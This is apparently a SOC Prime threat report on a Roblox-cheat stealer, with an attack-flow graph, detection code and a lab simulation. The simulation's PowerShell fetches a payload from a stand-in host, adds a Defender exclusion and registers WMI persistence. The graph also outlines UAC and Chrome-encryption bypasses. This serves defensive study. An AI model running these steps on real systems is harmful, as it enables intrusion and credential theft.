SOC Prime Bias: Medium

08 Jun 2026 19:55 UTC

AI-Powered Roblox Cheats Deliver the Yuta/Solara Stealer

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A malicious Roblox cheat package combines a trojanized .NET interface with a Python stealer bundled through PyInstaller. The initial loader weakens Microsoft Defender protections, retrieves a second-stage payload from MediaFire, and launches malware derived from Glove Stealer to collect credentials, cookies, wallet files, and gaming-related assets. Stolen data is then exfiltrated through encrypted Discord webhooks and supported by a persistent Discord bot RAT.

Investigation

The report provides an in-depth static analysis of the malware, including extraction of the PyInstaller payload, decompilation of Python 3.12 bytecode, and mapping of the credential-theft workflow. It also outlines the full multi-stage execution chain, the defense-evasion methods used by the operators, and the five-layer bypass approach targeting Chrome App-Bound Encryption protections.

Mitigation

Organizations should block execution of unknown unsigned binaries, apply strict application allow-listing, monitor for changes to Defender exclusions and suspicious PowerShell usage, and detect unusual downloads of configuration data from Pastebin. Discord webhook traffic should be restricted or closely monitored, and defenders should watch for abnormal Chrome launches that use debugger-related flags.

Response

Security teams should alert on creation of winupdate.exe in the AppData cache, suspicious registry Run key modifications, scheduled task creation, and unusual Discord channel activity. Malicious files should be quarantined, unauthorized Defender exclusions removed, and forensic collection performed on any credential stores that may have been harvested.
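The Mitigation and Response sections name a set of host and network indicators (Defender exclusion changes, Pastebin configuration downloads, winupdate.exe landing in the AppData cache, Run key and scheduled task persistence, Chrome started with debugger-related flags, Discord webhook traffic). The following is an added example, not SOC Prime's detection content or any vendor's rule, that encodes those indicators as checks over a constructed, Sysmon-style event stream so the logic can be exercised offline. The event fields (kind, image, cmdline, target, dest) and all sample values are this example's own simplifications and constructed data.

```python
"""Detection checks for the indicators listed under Mitigation and Response.

Added example, not SOC Prime's own detection content. Event fields are a
simplified, Sysmon-like shape chosen for this example; sample events are
constructed, not captured from the real campaign.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str          # "process" (created), "file" (created), "registry" (value set), "network" (connection)
    image: str = ""    # image that performed the action
    cmdline: str = ""  # full command line (process events)
    target: str = ""   # file or registry path written (file/registry events)
    dest: str = ""     # destination URL (network events)


def _ci(pattern: str, text: str) -> bool:
    """Case-insensitive regex search helper (Windows paths and switches are case-insensitive)."""
    return re.search(pattern, text, re.IGNORECASE) is not None


# (rule name, technique cited in the report, predicate over a single event)
RULES = [
    ("Defender exclusion added from a command line", "T1562.001",
     lambda e: e.kind == "process" and _ci(r"add-mppreference\s+.*-exclusionpath", e.cmdline)),
    ("Configuration fetched from Pastebin", "T1102.001",
     lambda e: e.kind == "network" and _ci(r"://(?:[\w-]+\.)?pastebin\.com/", e.dest)),
    ("winupdate.exe written to the AppData cache directory", "T1105",
     lambda e: e.kind == "file" and _ci(r"\\appdata\\(?:roaming\\)?\.cache\\winupdate\.exe$", e.target)),
    ("Run key modified", "T1547.001",
     lambda e: e.kind == "registry"
               and _ci(r"\\software\\microsoft\\windows\\currentversion\\run\\", e.target)),
    ("Scheduled task created via schtasks", "T1547.001",
     lambda e: e.kind == "process" and _ci(r"\\schtasks\.exe$", e.image) and _ci(r"/create\b", e.cmdline)),
    ("Chrome launched with a remote-debugging flag", "T1555.003",
     lambda e: e.kind == "process" and _ci(r"\\chrome\.exe$", e.image)
               and _ci(r"--remote-debugging-(?:port|pipe)\b", e.cmdline)),
    ("Discord webhook contacted", "T1041",
     lambda e: e.kind == "network" and _ci(r"discord(?:app)?\.com/api/webhooks/", e.dest)),
]

# Constructed sample telemetry: one event per indicator, plus two benign events as noise.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Temp\SLaunch.exe",
          cmdline=r'SLaunch.exe -run -script "UpdateSplash.EnsureWindowsDefenderExclusion()" '
                  r'-Add-MpPreference -ExclusionPath "C:\Roblox"'),
    Event("network", image=r"C:\Temp\SLaunch.exe", dest="https://pastebin.com/raw/PLACEHOLDER_ID"),
    Event("file", image=r"C:\Temp\SLaunch.exe",
          target=r"C:\Users\alice\AppData\Roaming\.cache\winupdate.exe"),
    Event("registry", image=r"C:\Users\alice\AppData\Roaming\.cache\winupdate.exe",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate"),
    Event("process", image=r"C:\Windows\System32\schtasks.exe",
          cmdline=r'schtasks /create /tn WinUpdate /tr "C:\Users\alice\AppData\Roaming\.cache\winupdate.exe" /sc onlogon'),
    Event("process", image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          cmdline="chrome.exe --remote-debugging-port=9222 --headless"),
    Event("network", image=r"C:\Users\alice\AppData\Roaming\.cache\winupdate.exe",
          dest="https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN"),
    # benign noise that must not fire
    Event("process", image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          cmdline="chrome.exe --profile-directory=Default"),
    Event("file", image=r"C:\Windows\System32\svchost.exe", target=r"C:\Windows\Temp\cab1234.tmp"),
]


def evaluate(events):
    """Return (rule name, technique, event) for every event that satisfies a rule."""
    return [(name, technique, e) for e in events for name, technique, pred in RULES if pred(e)]


def fired_rules(events):
    """Names of the rules that fired at least once, in RULES order (a compact triage summary)."""
    seen = {name for name, _, _ in evaluate(events)}
    return [name for name, _, _ in RULES if name in seen]


if __name__ == "__main__":
    for name, technique, e in evaluate(SAMPLE_EVENTS):
        print(f"[{technique}] {name}: {e.image} {e.cmdline or e.target or e.dest}")
```

Each rule is deliberately narrow (image plus switch, or exact drop path) so that the benign Chrome launch and the svchost temp file in the sample do not fire; in a real pipeline the Run key and scheduled task checks would additionally be scoped to task actions or values pointing into user-writable directories, which is where the stealer stages itself according to the report.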

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef technique fill:#ffdd99
        classDef tool fill:#cccccc
        classDef process fill:#bbffbb
        classDef persistence fill:#ff99cc

        %% Node definitions
        action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim runs trojanized WPF executor disguised as a Roblox cheat tool."]
        class action_user_execution action
        technique_impair_defenses["<b>Technique</b> – <b>T1562.001 Impair Defenses: Disable or Modify Tools</b><br/>Adds current directory to Windows Defender exclusion list via PowerShell and patches AMSI/ETW functions."]
        class technique_impair_defenses technique
        tool_powershell["<b>Tool</b><br/>PowerShell script used to modify Defender exclusions and patch AMSI/ETW."]
        class tool_powershell tool
        technique_bypass_uac["<b>Technique</b> – <b>T1548.002 Abuse Elevation Control: Bypass UAC</b><br/>Hijacks HKCU\Software\Classes\ms-settings\Shell\Open\command and launches fodhelper.exe/computerdefaults.exe to obtain high-integrity execution."]
        class technique_bypass_uac technique
        tool_fodhelper["<b>Tool</b><br/>fodhelper.exe used for UAC bypass."]
        class tool_fodhelper tool
        technique_dead_drop["<b>Technique</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Retrieves XOR-encrypted configuration from Pastebin URLs and resolves MediaFire download link."]
        class technique_dead_drop technique
        technique_ingress_tool["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/>Downloads secondary PyInstaller-packed Python stealer (winupdate.exe) from MediaFire and stores it in %APPDATA%\.cache\winupdate.exe with hidden and system attributes."]
        class technique_ingress_tool technique
        process_secondary_payload["<b>Process</b><br/>winupdate.exe (Python stealer)"]
        class process_secondary_payload process
        technique_cred_browser["<b>Technique</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Multi-stage Chrome App-Bound Encryption bypass (debugger breakpoint, COM elevation, double DPAPI, DLL injection, UAC registry hijack) to obtain decrypted cookies, tokens, and passwords."]
        class technique_cred_browser technique
        technique_keylogging["<b>Technique</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Installs a low-level WH_KEYBOARD_LL hook to capture keystrokes."]
        class technique_keylogging technique
        technique_archive["<b>Technique</b> – <b>T1560.003 Archive via Custom Method</b><br/>Packages stolen files into an in-memory ZIP, chunked to ≤25 MB fragments."]
        class technique_archive technique
        technique_exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Sends ZIP chunks to a Discord webhook URL."]
        class technique_exfiltration technique
        tool_discord_webhook["<b>Tool</b><br/>Discord webhook used for data exfiltration."]
        class tool_discord_webhook tool
        technique_discord_rath["<b>Technique</b> – <b>Discord Bot RAT</b><br/>Uses decrypted Discord bot token and channel ID to receive remote commands (shell, webcam, trace, etc.)."]
        class technique_discord_rath technique
        technique_persistence["<b>Technique</b> – <b>T1547.001 Boot/Logon Autostart Execution</b><br/>Creates scheduled task, HKCU Run key, startup VBS script, COM hijack, PowerShell profile entry, and WMI Event Subscription to relaunch payload after reboot."]
        class technique_persistence persistence
        persistence_mechanisms["<b>Process</b><br/>Scheduled task / Run key / VBS / COM hijack / PowerShell profile / WMI event"]
        class persistence_mechanisms process
        technique_dynamic_resolution["<b>Technique</b> – <b>T1568 Dynamic Resolution</b><br/>Periodically re-fetches configuration from Pastebin to adapt C2 endpoints."]
        class technique_dynamic_resolution technique

        %% Connections
        action_user_execution -->|triggers| technique_impair_defenses
        technique_impair_defenses -->|uses| tool_powershell
        technique_impair_defenses -->|enables| technique_bypass_uac
        technique_bypass_uac -->|uses| tool_fodhelper
        technique_bypass_uac -->|leads to| technique_dead_drop
        technique_dead_drop -->|retrieves| technique_ingress_tool
        technique_ingress_tool -->|stores and runs| process_secondary_payload
        process_secondary_payload -->|executes| technique_cred_browser
        process_secondary_payload -->|executes| technique_keylogging
        process_secondary_payload -->|collects data for| technique_archive
        technique_archive -->|prepares data for| technique_exfiltration
        technique_exfiltration -->|sends to| tool_discord_webhook
        tool_discord_webhook -->|feeds| technique_discord_rath
        technique_discord_rath -->|maintains command channel for| technique_persistence
        technique_persistence -->|establishes| persistence_mechanisms
        technique_persistence -->|supports| technique_dynamic_resolution
        technique_dynamic_resolution -->|updates| technique_dead_drop

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Ingress Tool Transfer (T1105): The attacker downloads the malicious Roblox executor (SLaunch.exe) from a compromised web server.
    2. Execution with Defender Tampering (T1548.002): Using PowerShell, the attacker runs SLaunch.exe with a command line that invokes Add-MpPreference -ExclusionPath "C:\Roblox" to whitelist the Roblox installation folder, preventing Windows Defender from scanning the injected payload.
    3. Persistence (T1546.003 / T1547.001): A WMI event subscription is created to relaunch SLaunch.exe at system startup.
    4. Credential Harvesting (T1056.001, T1555.003): While the injector is running, it captures keystrokes and extracts saved Roblox credentials from browser stores.
  • Regression Test Script: The following PowerShell script reproduces steps 2–3 and generates the telemetry the Sigma rule expects.

    # ------------------------------------------------------------
    # Roblox Injector Execution + Defender Exclusion (TC Script)
    # ------------------------------------------------------------
    
    # Paths (adjust as needed)
    $injectorPath = "C:\Temp\SLaunch.exe"
    $defenderExcl = "C:\Roblox"
    
    # 1. Ensure the injector exists (download placeholder)
    if (-Not (Test-Path $injectorPath)) {
        Write-Host "Downloading malicious injector..."
        Invoke-WebRequest -Uri "http://malicious.example.com/SLaunch.exe" -OutFile $injectorPath
    }
    
    # 2. Execute injector with Defender exclusion command line
    $cmd = "-run -script `"UpdateSplash.EnsureWindowsDefenderExclusion()`" -Add-MpPreference -ExclusionPath `"$defenderExcl`""
    Start-Process -FilePath $injectorPath -ArgumentList $cmd -NoNewWindow
    
    # 3. Create a WMI permanent event subscription for persistence
    # (the here-string terminator "@ must start at column 0 when this is run)
    $wmiFilter = @"
    SELECT * FROM __InstanceCreationEvent
    WITHIN 60
    WHERE TargetInstance ISA 'Win32_Process'
    AND TargetInstance.Name = 'SLaunch.exe'
    "@
    
    $filterPath = "ROOT\DEFAULT"
    $filterName = "RobloxInjectorFilter"
    $consumerName = "RobloxInjectorConsumer"
    
    # Register filter (WQL query against the root\cimv2 namespace)
    $filter = Set-WmiInstance -Namespace $filterPath -Class __EventFilter `
        -Arguments @{ Name=$filterName; Query=$wmiFilter; EventNamespace='root\cimv2'; QueryLanguage='WQL' }
    
    # Register command line consumer
    $consumer = Set-WmiInstance -Namespace $filterPath -Class CommandLineEventConsumer `
        -Arguments @{ Name=$consumerName; CommandLineTemplate="`"$injectorPath`"" }
    
    # Bind filter to consumer
    Set-WmiInstance -Namespace $filterPath -Class __FilterToConsumerBinding `
        -Arguments @{ Filter=$filter.__PATH; Consumer=$consumer.__PATH }
    
    Write-Host "Simulation complete - detection telemetry should have been generated."
  • Cleanup Commands: Remove the Defender exclusion and the WMI subscription created above.

    # Remove Defender exclusion
    Remove-MpPreference -ExclusionPath "C:\Roblox"
    
    # Delete WMI filter & consumer (same namespace the simulation registered them in)
    $filterPath = "ROOT\DEFAULT"
    Get-WmiObject -Namespace $filterPath -Class __EventFilter -Filter "Name='RobloxInjectorFilter'" | Remove-WmiObject
    Get-WmiObject -Namespace $filterPath -Class CommandLineEventConsumer -Filter "Name='RobloxInjectorConsumer'" | Remove-WmiObject
    Get-WmiObject -Namespace $filterPath -Class __FilterToConsumerBinding `
        -Filter "Filter=`"__EventFilter.Name='RobloxInjectorFilter'`"" | Remove-WmiObject
    
    # Delete the injector binary
    Remove-Item -Path "C:\Temp\SLaunch.exe" -Force
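The simulation registers a WMI event filter, a CommandLineEventConsumer and a binding between them, which is exactly the trio Sysmon records as Event IDs 19, 20 and 21. The block below is an added example, not SOC Prime's rule or code, showing how a defender correlates those three records into a single persistence alert and separates them from the benign SCM Event Log subscription present on every Windows host. The sample records are constructed to resemble Sysmon's fields for these events and carry only the fields the logic uses; the severity heuristic (consumer command pointing into a user-writable directory) is this example's own choice.

```python
"""Correlating Sysmon WMI events (IDs 19, 20, 21) into one persistence alert.

Added example, not SOC Prime's own rule or code. Sample records are
constructed to resemble Sysmon's WmiEvent fields for the filter, consumer
and binding the simulation script registers; only the fields used here
are included.
"""
import re

# Consumer classes that execute code when their filter fires.
EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Directories a standard user can write to; a consumer launching from one is rated higher.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|tmp|downloads|users\\public)\\", re.IGNORECASE)

# Constructed sample telemetry: the simulation's subscription plus Windows' default SCM subscription.
SAMPLE_WMI_EVENTS = [
    {"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": "LAB\\alice",
     "EventNamespace": "root\\cimv2", "Name": "RobloxInjectorFilter",
     "Query": "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' "
              "AND TargetInstance.Name = 'SLaunch.exe'"},
    {"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": "LAB\\alice",
     "Name": "RobloxInjectorConsumer", "Type": "Command Line", "Destination": "\"C:\\Temp\\SLaunch.exe\""},
    {"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": "LAB\\alice",
     "Consumer": "CommandLineEventConsumer.Name=\"RobloxInjectorConsumer\"",
     "Filter": "__EventFilter.Name=\"RobloxInjectorFilter\""},
    # Benign baseline: the built-in SCM subscription writes an event log entry and runs no code.
    {"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "EventNamespace": "root\\cimv2", "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": ""},
    {"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": "NTEventLogEventConsumer.Name=\"SCM Event Log Consumer\"",
     "Filter": "__EventFilter.Name=\"SCM Event Log Filter\""},
]


def _ref_name(ref: str) -> str:
    """Instance name from a Sysmon object reference such as __EventFilter.Name="X"."""
    m = re.search(r'\.Name="([^"]*)"', ref)
    return m.group(1) if m else ""


def correlate_wmi_subscriptions(events):
    """One alert per created binding that wires a filter to a code-executing consumer.

    Filter and consumer details come from earlier ID 19/20 records when they were
    logged; a binding whose filter or consumer creation was not observed still
    produces an alert, since the binding alone proves the subscription exists.
    """
    filters = {e["Name"]: e for e in events if e["EventID"] == 19 and e["Operation"] == "Created"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20 and e["Operation"] == "Created"}
    alerts = []
    for b in events:
        if b["EventID"] != 21 or b["Operation"] != "Created":
            continue
        consumer_class = b["Consumer"].split(".", 1)[0]
        if consumer_class not in EXECUTING_CONSUMERS:
            continue  # e.g. NTEventLogEventConsumer: records an event, executes nothing
        consumer = consumers.get(_ref_name(b["Consumer"]), {})
        flt = filters.get(_ref_name(b["Filter"]), {})
        destination = consumer.get("Destination", "")
        alerts.append({
            "user": b["User"],
            "filter": _ref_name(b["Filter"]),
            "query": flt.get("Query", "<filter creation not observed>"),
            "consumer_class": consumer_class,
            "destination": destination or "<consumer creation not observed>",
            "severity": "high" if USER_WRITABLE.search(destination) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in correlate_wmi_subscriptions(SAMPLE_WMI_EVENTS):
        print(f"{a['severity'].upper()}: {a['user']} bound {a['consumer_class']} "
              f"({a['destination']}) to filter '{a['filter']}' [{a['query']}]")
```

Keying on the binding (ID 21) rather than on the filter or consumer alone matters for the cleanup above as well: removing only the filter and consumer but leaving a stale binding, or the reverse, is a common reason such subscriptions resurface in later audits, so the same correlation can be rerun after cleanup to confirm nothing remains.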